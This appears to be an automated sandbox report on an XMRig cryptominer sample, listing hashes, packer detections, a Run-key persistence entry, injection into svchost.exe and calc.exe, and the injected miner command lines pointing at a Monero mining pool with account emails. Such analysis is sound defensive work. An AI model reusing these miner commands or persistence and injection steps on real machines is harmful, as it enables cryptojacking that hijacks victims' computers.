xmrig | 54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf

General

Target

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
Size

1.1MB
MD5

095cb62a0daf1fea377ab60917a24b67
SHA1

5a3cd2b24201a7cf6a98d6f1a06aa984dfed0e8c
SHA256

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf
SHA512

55194c0e738f3872ea1fb8a64881f6265ea9ec2bff2dbd722166283ac93a12fb85077aaf9b7ca075d69d58d2467460b1d7ab715f86796e8ec09df62980487d80

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 4 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	acprotect
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	acprotect
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	acprotect
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	acprotect

XMRig Miner Payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3520-133-0x0000000000E50000-0x0000000000F53000-memory.dmp	xmrig
behavioral2/memory/3520-136-0x0000000000E50000-0x0000000000F53000-memory.dmp	xmrig
behavioral2/memory/4240-137-0x0000000000E20000-0x0000000000F23000-memory.dmp	xmrig
behavioral2/memory/4240-141-0x0000000000E20000-0x0000000000F23000-memory.dmp	xmrig
behavioral2/memory/3520-143-0x0000000000E50000-0x0000000000F53000-memory.dmp	xmrig
behavioral2/memory/4240-144-0x0000000000E20000-0x0000000000F23000-memory.dmp	xmrig
behavioral2/memory/3380-145-0x0000000000150000-0x0000000000253000-memory.dmp	xmrig
behavioral2/memory/3380-148-0x0000000000150000-0x0000000000253000-memory.dmp	xmrig
behavioral2/memory/4804-149-0x00000000010B0000-0x00000000011B3000-memory.dmp	xmrig
behavioral2/memory/4804-151-0x00000000010B0000-0x00000000011B3000-memory.dmp	xmrig
behavioral2/memory/3380-152-0x0000000000150000-0x0000000000253000-memory.dmp	xmrig
behavioral2/memory/4804-153-0x00000000010B0000-0x00000000011B3000-memory.dmp	xmrig

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	upx
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	upx
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	upx
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL	upx

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Loads dropped DLL 4 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

pid	process
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ondriver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe"	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

description	pid	process	target process
PID 2588 set thread context of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 set thread context of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 set thread context of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 set thread context of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

pid	process
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

svchost.execalc.exesvchost.execalc.exe

description	pid	process
Token: SeLockMemoryPrivilege	3520	svchost.exe
Token: SeLockMemoryPrivilege	3520	svchost.exe
Token: SeLockMemoryPrivilege	4240	calc.exe
Token: SeLockMemoryPrivilege	4240	calc.exe
Token: SeLockMemoryPrivilege	3380	svchost.exe
Token: SeLockMemoryPrivilege	3380	svchost.exe
Token: SeLockMemoryPrivilege	4804	calc.exe
Token: SeLockMemoryPrivilege	4804	calc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

pid	process
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

pid	process
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe

description	pid	process	target process
PID 2588 wrote to memory of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3520	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4240	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 3380	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	svchost.exe
PID 2588 wrote to memory of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe
PID 2588 wrote to memory of 4804	2588	54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe	calc.exe

C:\Users\Admin\AppData\Local\Temp\54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe
"C:\Users\Admin\AppData\Local\Temp\54b803e59c04d3b88b1a6e8e2ff3ad65cddcaa164733b67319a897b974a926cf.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\SysWOW64\svchost.exe
-o xmr.pool.minergate.com:45560 -u mikaelamonero2@gmx.com -p x --max-cpu-usage=20 --donate-level=1 -k -B
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\SysWOW64\calc.exe
-o xmr.pool.minergate.com:45560 -u thiagoiphones6@gmail.com -p x --max-cpu-usage=50 --donate-level=1 -k -B
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4240

C:\Windows\SysWOW64\svchost.exe
-o xmr.pool.minergate.com:45560 -u mikaelamonero2@gmx.com -p x --max-cpu-usage=20 --donate-level=1 -k -B
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\SysWOW64\calc.exe
-o xmr.pool.minergate.com:45560 -u thiagoiphones6@gmail.com -p x --max-cpu-usage=50 --donate-level=1 -k -B
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4804

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LZMA.DLL
Filesize
22KB

MD5
ccf916511374fa95c4c685ee0854fe9e

SHA1
27d7458ecafb17c202d262c990bd06f4d47098bd

SHA256
2a6b997d31834bd186e6ed19651b33bda29260ba09a17a78c6e81dfbc6b299de

SHA512
db90ddfb847192fd4736278d48ef31629e8e01e03f92e5c3c262963a2207b7f750d9200fa5f7904d659d3ebb3dd45cebd5a54779395da24a56ea8a3bc1923cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL
Filesize
22KB

MD5
ccf916511374fa95c4c685ee0854fe9e

SHA1
27d7458ecafb17c202d262c990bd06f4d47098bd

SHA256
2a6b997d31834bd186e6ed19651b33bda29260ba09a17a78c6e81dfbc6b299de

SHA512
db90ddfb847192fd4736278d48ef31629e8e01e03f92e5c3c262963a2207b7f750d9200fa5f7904d659d3ebb3dd45cebd5a54779395da24a56ea8a3bc1923cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL
Filesize
22KB

MD5
ccf916511374fa95c4c685ee0854fe9e

SHA1
27d7458ecafb17c202d262c990bd06f4d47098bd

SHA256
2a6b997d31834bd186e6ed19651b33bda29260ba09a17a78c6e81dfbc6b299de

SHA512
db90ddfb847192fd4736278d48ef31629e8e01e03f92e5c3c262963a2207b7f750d9200fa5f7904d659d3ebb3dd45cebd5a54779395da24a56ea8a3bc1923cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\LZMA.DLL
Filesize
22KB

MD5
ccf916511374fa95c4c685ee0854fe9e

SHA1
27d7458ecafb17c202d262c990bd06f4d47098bd

SHA256
2a6b997d31834bd186e6ed19651b33bda29260ba09a17a78c6e81dfbc6b299de

SHA512
db90ddfb847192fd4736278d48ef31629e8e01e03f92e5c3c262963a2207b7f750d9200fa5f7904d659d3ebb3dd45cebd5a54779395da24a56ea8a3bc1923cad

Download Submit
memory/3380-152-0x0000000000150000-0x0000000000253000-memory.dmp

Filesize
1.0MB

Download
memory/3380-148-0x0000000000150000-0x0000000000253000-memory.dmp

Filesize
1.0MB

Download
memory/3380-145-0x0000000000150000-0x0000000000253000-memory.dmp

Filesize
1.0MB

Download
memory/3380-142-0x0000000000000000-mapping.dmp

Download
memory/3520-136-0x0000000000E50000-0x0000000000F53000-memory.dmp

Filesize
1.0MB

Download
memory/3520-143-0x0000000000E50000-0x0000000000F53000-memory.dmp

Filesize
1.0MB

Download
memory/3520-133-0x0000000000E50000-0x0000000000F53000-memory.dmp

Filesize
1.0MB

Download
memory/3520-132-0x0000000000000000-mapping.dmp

Download
memory/4240-137-0x0000000000E20000-0x0000000000F23000-memory.dmp

Filesize
1.0MB

Download
memory/4240-141-0x0000000000E20000-0x0000000000F23000-memory.dmp

Filesize
1.0MB

Download
memory/4240-144-0x0000000000E20000-0x0000000000F23000-memory.dmp

Filesize
1.0MB

Download
memory/4240-134-0x0000000000000000-mapping.dmp

Download
memory/4804-146-0x0000000000000000-mapping.dmp

Download
memory/4804-149-0x00000000010B0000-0x00000000011B3000-memory.dmp

Filesize
1.0MB

Download
memory/4804-151-0x00000000010B0000-0x00000000011B3000-memory.dmp

Filesize
1.0MB

Download
memory/4804-153-0x00000000010B0000-0x00000000011B3000-memory.dmp

Filesize
1.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads